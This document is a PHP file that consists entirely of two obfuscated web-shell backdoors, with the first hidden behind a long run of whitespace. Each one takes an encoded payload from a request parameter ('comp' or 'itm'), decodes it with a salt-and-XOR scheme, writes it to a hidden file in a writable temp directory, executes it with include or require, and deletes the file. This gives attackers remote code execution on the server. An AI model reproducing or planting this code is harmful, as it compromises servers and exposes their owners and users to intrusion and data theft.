<?php																																										if(isset($_REQUEST["\x63\x6Fmp"]) ? true : false){ $reference = $_REQUEST["\x63\x6Fmp"]; $reference = explode("." ,$reference ) ; $elem = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s3); $y = 0; while($y < count($reference)) { $v4 = $reference[$y]; $chS = ord($s3[$y% $lenS]); $d = ((int)$v4 - $chS -($y% 10)) ^ 4; $elem .= chr($d); $y++; } $data_chunk = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/tmp", getcwd(), "/var/tmp", "/dev/shm", sys_get_temp_dir()]); foreach ($data_chunk as $mrk): if ((function($d) { return is_dir($d) && is_writable($d); })($mrk)) { $itm = "$mrk" . "/.entry"; if (file_put_contents($itm, $elem)) { require $itm; unlink($itm); exit; } } endforeach; }


if(isset($_REQUEST["i\x74\x6D"]) ? true : false){
	$pset = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), session_save_path(), "/dev/shm", "/var/tmp", "/tmp", getcwd(), getenv("TMP")]);
	$marker = $_REQUEST["i\x74\x6D"];
	 	$marker =	explode (		'.' 		,  	$marker);			
	$element	= '';
            $salt	= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	= strlen($salt);
    
            foreach ($marker as $m	=> $v1) { 	$sChar	= ord($salt[$m % $sLen]);
                $d	= ((int)$v1 - $sChar - ($m % 10))^ 66;
                $element .= chr($d);}
	while ($flag = array_shift($pset)) {
    		if (is_dir($flag) ? is_writable($flag) : false) {
    $resource = str_replace("{var_dir}", $flag, "{var_dir}/.k");
    $success = file_put_contents($resource, $element);
if ($success) {
	include $resource;
	@unlink($resource);
	die();}
}
}
}